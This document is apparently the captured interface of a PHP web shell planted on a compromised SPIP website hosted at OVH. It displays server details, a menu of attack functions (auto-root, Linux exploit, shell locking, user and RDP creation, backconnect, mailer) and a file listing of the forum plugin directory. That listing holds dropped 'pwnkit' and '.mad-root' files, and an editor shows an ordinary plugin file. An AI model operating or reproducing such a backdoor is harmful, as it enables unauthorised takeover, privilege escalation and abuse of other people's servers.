Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
forum /
[ HOME SHELL ]
Name
Size
Permission
Action
action
[ DIR ]
drwx---r-x
balise
[ DIR ]
drwx---r-x
base
[ DIR ]
drwx---r-x
formulaires
[ DIR ]
drwx---r-x
inc
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
modeles
[ DIR ]
drwx---r-x
notifications
[ DIR ]
drwx---r-x
prive
[ DIR ]
drwx---r-x
public
[ DIR ]
drwx---r-x
urls
[ DIR ]
drwx---r-x
.gitattributes
232
B
-rw----r--
.gitignore
92
B
-rw----r--
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
2.34
KB
-rw----r--
README.md
3.25
KB
-rw----r--
TODO.md
862
B
-rw----r--
composer.json
718
B
-rw----r--
forum_administrations.php
4.37
KB
-rw----r--
forum_autoriser.php
9.05
KB
-rw----r--
forum_fonctions.php
2.47
KB
-rw----r--
forum_ieconfig.php
1.36
KB
-rw----r--
forum_pipelines.php
13.64
KB
-rw----r--
paquet.xml
2.06
KB
-rw----r--
phpcs.xml.dist
388
B
-rw----r--
phpstan-baseline.neon
32.54
KB
-rw----r--
phpstan.neon.dist
166
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forum_ieconfig.php
<?php /** * Déclarations des configurations qui peuvent être sauvegardées * * @package SPIP\Forum\Pipelines **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Ajoute les metas sauvegardables de Forum pour le plugin IEConfig * * @pipeline ieconfig_metas * * @param array $table * Déclaration des sauvegardes * @return array * Déclaration des sauvegardes complétées **/ function forum_ieconfig_metas($table) { $table['forums_contenu']['titre'] = _T('forum:titre_forum'); $table['forums_contenu']['icone'] = 'forum-public-16.png'; $table['forums_contenu']['metas_brutes'] = 'forums_titre,forums_texte,forums_urlref,forums_afficher_barre,formats_documents_forum'; $table['forums_notifications']['titre'] = _T('forum:info_envoi_forum'); $table['forums_notifications']['icone'] = 'annonce-16.png'; $table['forums_notifications']['metas_brutes'] = 'prevenir_auteurs'; $table['forums_participants']['titre'] = _T('forum:info_mode_fonctionnement_defaut_forum_public'); $table['forums_participants']['icone'] = 'forum-interne-16.png'; $table['forums_participants']['metas_brutes'] = 'forums_publics'; $table['forums_prives']['titre'] = _T('forum:titre_config_forums_prive'); $table['forums_prives']['icone'] = 'forum-interne-16.png'; $table['forums_prives']['metas_brutes'] = 'forum_prive_objets,forum_prive,forum_prive_admin'; return $table; }
Close